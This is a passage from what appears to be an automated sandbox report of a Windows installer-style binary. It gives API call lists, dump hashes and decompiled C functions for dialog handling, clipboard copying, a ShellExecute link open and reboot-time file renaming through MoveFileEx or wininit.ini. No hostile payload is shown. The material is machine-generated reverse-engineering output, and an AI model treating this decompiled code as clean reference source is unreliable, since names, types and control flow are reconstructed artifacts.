            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
            • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
            • ShowWindow.USER32(?,00000008), ref: 00404FEF
            • GetDlgItem.USER32 ref: 00405005
            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
            • GetDlgItem.USER32 ref: 00405057
            • CreateThread.KERNEL32(00000000,00000000,Function_00004E34,00000000), ref: 00405065
            • CloseHandle.KERNEL32(00000000), ref: 0040506C
            • ShowWindow.USER32(00000000), ref: 00405090
            • ShowWindow.USER32(?,00000008), ref: 00405095
            • ShowWindow.USER32(00000008), ref: 004050DB
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
            • CreatePopupMenu.USER32 ref: 0040511E
            • AppendMenuA.USER32 ref: 00405133
            • GetWindowRect.USER32 ref: 00405146
            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
            • OpenClipboard.USER32(00000000), ref: 004051B3
            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
            • GlobalLock.KERNEL32 ref: 004051CC
            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
            • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
            • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
            • SetClipboardData.USER32 ref: 00405209
            • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040520F
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
            • String ID: {
            • API String ID: 1050754034-366298937
            • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
            • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
            • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
            				void* _v84;
            				void* _v88;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed int _t33;
            				signed int _t35;
            				struct HWND__* _t37;
            				struct HWND__* _t47;
            				struct HWND__* _t65;
            				struct HWND__* _t71;
            				struct HWND__* _t84;
            				struct HWND__* _t89;
            				struct HWND__* _t97;
            				int _t101;
            				int _t104;
            				struct HWND__* _t117;
            				struct HWND__* _t120;
            				signed int _t122;
            				struct HWND__* _t127;
            				long _t132;
            				int _t134;
            				int _t135;
            				struct HWND__* _t136;
            				void* _t139;
            
            				_t135 = _a8;
            				if(_t135 == 0x110 || _t135 == 0x408) {
            					_t33 = _a12;
            					_t117 = _a4;
            					__eflags = _t135 - 0x110;
            					 *0x79f56c = _t33;
            					if(_t135 == 0x110) {
            						 *0x7a2f84 = _t117;
            						 *0x79f57c = GetDlgItem(_t117, 1);
            						_t89 = GetDlgItem(_t117, 2);
            						_push(0xffffffff);
            						_push(0x1c);
            						 *0x79e548 = _t89;
            						E00403DA7(_t117);
            						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
            						 *0x7a274c = E00401410(4);
            						_t33 = 1;
            						__eflags = 1;
            						 *0x79f56c = 1;
            					}
            					_t120 =  *0x409284; // 0xffffffff
            					_t132 = (_t120 << 6) +  *0x7a2fa0;
            					__eflags = _t120;
            					if(_t120 < 0) {
            						L38:
            						E00403DF3(0x40b);
            						while(1) {
            							_t35 =  *0x79f56c;
            							 *0x409284 =  *0x409284 + _t35;
            							_t132 = _t132 + (_t35 << 6);
            							_t37 =  *0x409284; // 0xffffffff
            							__eflags = _t37 -  *0x7a2fa4;
            							if(_t37 ==  *0x7a2fa4) {
            								E00401410(1);
            							}
            							__eflags =  *0x7a274c;
            							if( *0x7a274c != 0) {
            								break;
            							}
            							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
            							if(__eflags >= 0) {
            								break;
            							}
            							_push( *((intOrPtr*)(_t132 + 0x24)));
            							_t122 =  *(_t132 + 0x14);
            							_push(0x7ab000);
            							E004059E1(_t117, _t122, _t132);
            							_push( *((intOrPtr*)(_t132 + 0x20)));
            							_push(0xfffffc19);
            							E00403DA7(_t117);
            							_push( *((intOrPtr*)(_t132 + 0x1c)));
            							_push(0xfffffc1b);
            							E00403DA7(_t117);
            							_push( *((intOrPtr*)(_t132 + 0x28)));
            							_push(0xfffffc1a);
            							E00403DA7(_t117);
            							_t47 = GetDlgItem(_t117, 3);
            							__eflags =  *0x7a300c;
            							_t136 = _t47;
            							if( *0x7a300c != 0) {
            								_t122 = _t122 & 0x0000fefd | 0x00000004;
            								__eflags = _t122;
            							}
            							ShowWindow(_t136, _t122 & 0x00000008);
            							EnableWindow(_t136, _t122 & 0x00000100);
            							E00403DC9(_t122 & 0x00000002);
            							EnableWindow( *0x79e548, _t122 & 0x00000004);
            							SendMessageA(_t136, 0xf4, 0, 1);
            							__eflags =  *0x7a300c;
            							if( *0x7a300c == 0) {
            								_push( *0x79f57c);
            							} else {
            								SendMessageA(_t117, 0x401, 2, 0);
            								_push( *0x79e548);
            							}
            							E00403DDC();
            							E004059BF(0x79f580, 0x7a2780);
            							_push( *((intOrPtr*)(_t132 + 0x18)));
            							_push( &(0x79f580[lstrlenA(0x79f580)]));
            							E004059E1(_t117, 0, _t132);
            							SetWindowTextA(_t117, 0x79f580);
            							_push(0);
            							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
            							__eflags = _t65;
            							if(_t65 != 0) {
            								continue;
            							} else {
            								__eflags =  *_t132 - _t65;
            								if( *_t132 == _t65) {
            									continue;
            								}
            								__eflags =  *(_t132 + 4) - 5;
            								if( *(_t132 + 4) != 5) {
            									DestroyWindow( *0x7a2758);
            									 *0x79ed58 = _t132;
            									__eflags =  *_t132;
            									if( *_t132 > 0) {
            										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
            										__eflags = _t71;
            										 *0x7a2758 = _t71;
            										if(_t71 != 0) {
            											_push( *((intOrPtr*)(_t132 + 0x2c)));
            											_push(6);
            											E00403DA7(_t71);
            											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
            											ScreenToClient(_t117, _t139 + 0x10);
            											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
            											_push(0);
            											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
            											ShowWindow( *0x7a2758, 8);
            											E00403DF3(0x405);
            										}
            									}
            									goto L58;
            								}
            								__eflags =  *0x7a300c - _t65;
            								if( *0x7a300c != _t65) {
            									goto L61;
            								}
            								__eflags =  *0x7a3000 - _t65;
            								if( *0x7a3000 != _t65) {
            									continue;
            								}
            								goto L61;
            							}
            						}
            						DestroyWindow( *0x7a2758);
            						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
            						__eflags =  *0x7a2f84;
            						EndDialog(_t117,  *0x79e950);
            						goto L58;
            					} else {
            						__eflags = _t33 - 1;
            						if(_t33 != 1) {
            							L37:
            							__eflags =  *_t132;
            							if( *_t132 == 0) {
            								goto L61;
            							}
            							goto L38;
            						}
            						_push(0);
            						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
            						__eflags = _t84;
            						if(_t84 == 0) {
            							goto L37;
            						}
            						SendMessageA( *0x7a2758, 0x40f, 0, 1);
            						__eflags =  *0x7a274c;
            						return 0 |  *0x7a274c == 0x00000000;
            					}
            				} else {
            					_t117 = _a4;
            					if(_t135 == 0x47) {
            						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
            					}
            					if(_t135 == 5) {
            						asm("sbb eax, eax");
            						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
            					}
            					if(_t135 != 0x40d) {
            						__eflags = _t135 - 0x11;
            						if(_t135 != 0x11) {
            							__eflags = _t135 - 0x10;
            							if(_t135 != 0x10) {
            								L14:
            								__eflags = _t135 - 0x111;
            								if(_t135 != 0x111) {
            									L30:
            									return E00403E0E(_t135, _a12, _a16);
            								}
            								_t134 = _a12 & 0x0000ffff;
            								_t127 = GetDlgItem(_t117, _t134);
            								__eflags = _t127;
            								if(_t127 == 0) {
            									L17:
            									__eflags = _t134 - 1;
            									if(_t134 != 1) {
            										__eflags = _t134 - 3;
            										if(_t134 != 3) {
            											__eflags = _t134 - 2;
            											if(_t134 != 2) {
            												L29:
            												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
            												goto L30;
            											}
            											__eflags =  *0x7a300c;
            											if( *0x7a300c == 0) {
            												_t97 = E00401410(3);
            												__eflags = _t97;
            												if(_t97 != 0) {
            													goto L30;
            												}
            												 *0x79e950 = 1;
            												L25:
            												_push(0x78);
            												L26:
            												E00403D80();
            												goto L30;
            											}
            											E00401410(_t134);
            											 *0x79e950 = _t134;
            											goto L25;
            										}
            										__eflags =  *0x409284;
            										if( *0x409284 <= 0) {
            											goto L29;
            										}
            										_push(0xffffffff);
            										goto L26;
            									}
            									_push(1);
            									goto L26;
            								}
            								SendMessageA(_t127, 0xf3, 0, 0);
            								_t101 = IsWindowEnabled(_t127);
            								__eflags = _t101;
            								if(_t101 == 0) {
            									goto L61;
            								}
            								goto L17;
            							}
            							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
            							if(__eflags != 0) {
            								goto L30;
            							}
            							_t104 = IsWindowEnabled( *0x79e548);
            							__eflags = _t104;
            							if(_t104 != 0) {
            								goto L30;
            							}
            							_t135 = 0x111;
            							_a12 = 1;
            							goto L14;
            						}
            						SetWindowLongA(_t117, 0, 0);
            						return 1;
            					} else {
            						DestroyWindow( *0x7a2758);
            						 *0x7a2758 = _a12;
            						L58:
            						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
            							ShowWindow(_t117, 0xa);
            							 *0x7a0580 = 1;
            						}
            						L61:
            						return 0;
            					}
            				}
            			}

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
            • ShowWindow.USER32(?), ref: 00403918
            • DestroyWindow.USER32 ref: 0040392C
            • SetWindowLongA.USER32 ref: 0040394A
            • IsWindowEnabled.USER32 ref: 00403975
            • GetDlgItem.USER32 ref: 004039A3
            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
            • IsWindowEnabled.USER32(00000000), ref: 004039C2
            • GetDlgItem.USER32 ref: 00403A6A
            • GetDlgItem.USER32 ref: 00403A74
            • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
            • GetDlgItem.USER32 ref: 00403B86
            • ShowWindow.USER32(00000000,?), ref: 00403BA6
            • EnableWindow.USER32(00000000,?), ref: 00403BB5
            • EnableWindow.USER32(?,?), ref: 00403BD0
            • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
            • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
            • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
            • ShowWindow.USER32(?,0000000A), ref: 00403D64
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
            • String ID:
            • API String ID: 3950083612-0
            • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
            • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
            • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 92%
            			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
            				char* _v8;
            				signed int _v12;
            				void* _v16;
            				struct HWND__* _t52;
            				long _t86;
            				int _t98;
            				struct HWND__* _t99;
            				signed int _t100;
            				intOrPtr _t109;
            				int _t110;
            				signed int* _t112;
            				signed int _t113;
            				char* _t114;
            				CHAR* _t115;
            
            				if(_a8 != 0x110) {
            					if(_a8 != 0x111) {
            						L11:
            						if(_a8 != 0x4e) {
            							if(_a8 == 0x40b) {
            								 *0x79f568 =  *0x79f568 + 1;
            							}
            							L25:
            							_t110 = _a16;
            							L26:
            							return E00403E0E(_a8, _a12, _t110);
            						}
            						_t52 = GetDlgItem(_a4, 0x3e8);
            						_t110 = _a16;
            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
            							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
            							_t109 =  *((intOrPtr*)(_t110 + 0x18));
            							_v12 = _t100;
            							_v16 = _t109;
            							_v8 = 0x7a1f20;
            							if(_t100 - _t109 < 0x800) {
            								SendMessageA(_t52, 0x44b, 0,  &_v16);
            								SetCursor(LoadCursorA(0, 0x7f02));
            								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
            								SetCursor(LoadCursorA(0, 0x7f00));
            								_t110 = _a16;
            							}
            						}
            						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
            							goto L26;
            						} else {
            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
            								SendMessageA( *0x7a2f84, 0x111, 1, 0);
            							}
            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
            								SendMessageA( *0x7a2f84, 0x10, 0, 0);
            							}
            							return 1;
            						}
            					}
            					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
            						goto L25;
            					} else {
            						_t112 =  *0x79ed58 + 0x14;
            						if(( *_t112 & 0x00000020) == 0) {
            							goto L25;
            						}
            						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
            						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
            						E0040417A();
            						goto L11;
            					}
            				}
            				_t98 = _a16;
            				_t113 =  *(_t98 + 0x30);
            				if(_t113 < 0) {
            					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
            				}
            				_push( *((intOrPtr*)(_t98 + 0x34)));
            				_t114 = _t113 +  *0x7a2fb8;
            				_push(0x22);
            				_a16 =  *_t114;
            				_v12 = _v12 & 0x00000000;
            				_t115 = _t114 + 1;
            				_v16 = _t115;
            				_v8 = E00403EBB;
            				E00403DA7(_a4);
            				_push( *((intOrPtr*)(_t98 + 0x38)));
            				_push(0x23);
            				E00403DA7(_a4);
            				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
            				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
            				_t99 = GetDlgItem(_a4, 0x3e8);
            				E00403DDC(_t99);
            				SendMessageA(_t99, 0x45b, 1, 0);
            				_t86 =  *( *0x7a2f88 + 0x68);
            				if(_t86 < 0) {
            					_t86 = GetSysColor( ~_t86);
            				}
            				SendMessageA(_t99, 0x443, 0, _t86);
            				SendMessageA(_t99, 0x445, 0, 0x4010000);
            				 *0x79e54c =  *0x79e54c & 0x00000000;
            				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
            				SendMessageA(_t99, 0x449, _a16,  &_v16);
            				 *0x79f568 =  *0x79f568 & 0x00000000;
            				return 0;
            			}

            APIs
            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
            • GetDlgItem.USER32 ref: 00403F8E
            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
            • GetSysColor.USER32(?), ref: 00403FBD
            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
            • lstrlenA.KERNEL32(?), ref: 00403FE5
            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
            • GetDlgItem.USER32 ref: 00404065
            • SendMessageA.USER32(00000000), ref: 00404068
            • GetDlgItem.USER32 ref: 00404093
            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
            • LoadCursorA.USER32 ref: 004040E2
            • SetCursor.USER32(00000000), ref: 004040EB
            • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
            • LoadCursorA.USER32 ref: 0040410B
            • SetCursor.USER32(00000000), ref: 0040410E
            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: N$open
            • API String ID: 3615053054-904208323
            • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
            • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
            • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E00405707(long _a4, long _a16) {
            				CHAR* _v0;
            				intOrPtr* _t13;
            				long _t14;
            				int _t19;
            				void* _t27;
            				long _t28;
            				intOrPtr* _t36;
            				int _t42;
            				intOrPtr* _t43;
            				long _t48;
            				CHAR* _t50;
            				void* _t52;
            				void* _t54;
            
            				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
            				_t50 = _v0;
            				if(_t13 != 0) {
            					_t19 =  *_t13(_a4, _t50, 5);
            					if(_t19 != 0) {
            						L16:
            						 *0x7a3010 =  *0x7a3010 + 1;
            						return _t19;
            					}
            				}
            				 *0x7a1710 = 0x4c554e;
            				if(_t50 == 0) {
            					L5:
            					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
            					if(_t14 != 0 && _t14 <= 0x400) {
            						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
            						GetWindowsDirectoryA(0x7a1188, 0x3f0);
            						lstrcatA(0x7a1188, "\\wininit.ini");
            						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
            						_t54 = _t19;
            						if(_t54 == 0xffffffff) {
            							goto L16;
            						}
            						_t48 = GetFileSize(_t54, 0);
            						_t5 = _t42 + 0xa; // 0xa
            						_t52 = GlobalAlloc(0x40, _t48 + _t5);
            						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
            							L15:
            							_t19 = CloseHandle(_t54);
            							goto L16;
            						} else {
            							if(E00405624(_t52, "[Rename]\r\n") != 0) {
            								_t27 = E00405624(_t25 + 0xa, "\n[");
            								if(_t27 == 0) {
            									L13:
            									_t28 = _t48;
            									L14:
            									E00405670(_t52 + _t28, 0x7a0d88, _t42);
            									SetFilePointer(_t54, 0, 0, 0);
            									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
            									GlobalFree(_t52);
            									goto L15;
            								}
            								_t36 = _t27 + 1;
            								_t43 = _t36;
            								if(_t36 >= _t52 + _t48) {
            									L21:
            									_t28 = _t36 - _t52;
            									goto L14;
            								} else {
            									goto L20;
            								}
            								do {
            									L20:
            									 *((char*)(_t43 + _t42)) =  *_t43;
            									_t43 = _t43 + 1;
            								} while (_t43 < _t52 + _t48);
            								goto L21;
            							}
            							E004059BF(_t52 + _t48, "[Rename]\r\n");
            							_t48 = _t48 + 0xa;
            							goto L13;
            						}
            					}
            				} else {
            					CloseHandle(E00405690(_t50, 0, 1));
            					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
            					if(_t14 != 0 && _t14 <= 0x400) {
            						goto L5;
            					}
            				}
            				return _t14;
            			}

            APIs
              • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
              • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
              • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
            • GetShortPathNameA.KERNEL32(?,007A1710,00000400), ref: 00405765
            • GetShortPathNameA.KERNEL32(00000000,007A1188,00000400), ref: 00405782
            • wsprintfA.USER32 ref: 004057A0
            • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
            • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
            • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
            • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
            • GlobalFree.KERNEL32 ref: 0040586C
            • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
              • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
            • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
            • API String ID: 3633819597-1342836890
            • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
            • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
            • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
            				int _v8;
            				signed int _v12;
            				long _v16;
            				long _v20;
            				char _v24;
            				long _v28;
            				char _v32;
            				intOrPtr _v36;
            				long _v40;
            				signed int _v44;
            				CHAR* _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				CHAR* _v68;
            				void _v72;
            				char _v76;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				intOrPtr _t75;
            				signed char* _t80;
            				intOrPtr* _t81;
            				int _t86;
            				int _t88;
            				int _t100;
            				signed int _t105;
            				char* _t110;
            				intOrPtr _t114;
            				intOrPtr* _t128;
            				signed int _t140;
            				signed int _t145;
            				CHAR* _t151;
            
            				_t75 =  *0x79ed58;
            				_v36 = _t75;
            				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
            				_v12 =  *((intOrPtr*)(_t75 + 0x38));
            				if(_a8 == 0x40b) {
            					E004052A3(0x3fb, _t151);
            					E00405BFB(_t151);
            				}
            				if(_a8 != 0x110) {
            					L8:
            					if(_a8 != 0x111) {
            						L19:
            						if(_a8 == 0x40f) {
            							L21:
            							_v8 = _v8 & 0x00000000;
            							_v12 = _v12 & 0x00000000;
            							_t145 = _t144 | 0xffffffff;
            							E004052A3(0x3fb, _t151);
            							if(E004055AC(_t169, _t151) == 0) {
            								_v8 = 1;
            							}
            							E004059BF(0x79e550, _t151);
            							_t80 = E0040555F(0x79e550);
            							if(_t80 != 0) {
            								 *_t80 =  *_t80 & 0x00000000;
            							}
            							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
            							if(_t81 == 0) {
            								L28:
            								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
